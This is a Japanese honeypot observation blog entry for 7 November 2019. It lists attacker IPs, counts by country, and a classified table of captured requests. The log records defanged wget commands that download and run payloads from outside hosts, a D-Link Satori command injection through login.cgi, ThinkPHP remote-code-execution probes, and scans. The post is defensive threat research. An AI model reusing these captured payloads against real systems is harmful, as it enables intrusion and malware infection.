23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(236日目)

2019/11/07(木)

トータルは4155件でした。

ハンティングログは以下です。

90.195.6[.]131 wget+hxxp[:]//185.172.110[.]220/mipsel

www.virustotal.com
www.virustotal.com

106.51.70[.]50 wget+hxxp[:]//68.183.156[.]63/phone

www.virustotal.com

106.12.10[.]203 wget hxxp[:]//54.37.74[.]232/sh
www.virustotal.com

IPのロケーション別の件数は以下です。

ウルグアイ 4002
フランス 30
アメリ 29
ドイツ 24
オランダ 16
中国 13
ブラジル 8
インド 5
トルコ 4
イギリス 3
ウクライナ 2
イタリア 2
アルバニア 2
カナダ 2
シンガポール 2
スウェーデン 1
イラン 1
ブルガリア 1
韓国 1
マレーシア 1
スリナム 1
メキシコ 1
フィンランド 1
ベネズエラ 1
バングラデシュ 1
インドネシア 1

f:id:sec23:20191124053840p:plain

件数 概要 リクエス
4004 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
123 アクセス GET /
7 WordPressの調査 GET /wp-admin/
3 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
2 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
1 調査 HEAD /
1 調査 GET /script
1 D-Linkルータを狙ったSatoriの通信 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp[:]//54.37.74[.]232/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
1 調査 GET /is_test
1 phpMyAdminスキャン GET /muieblackcat
1 phpMyAdminスキャン GET //pma/scripts/setup.php
1 phpMyAdminスキャン GET //phpmyadmin/scripts/setup.php
1 phpMyAdminスキャン GET //phpMyAdmin/scripts/setup.php
1 phpMyAdminスキャン GET //myadmin/scripts/setup.php
1 phpMyAdminスキャン GET //MyAdmin/scripts/setup.php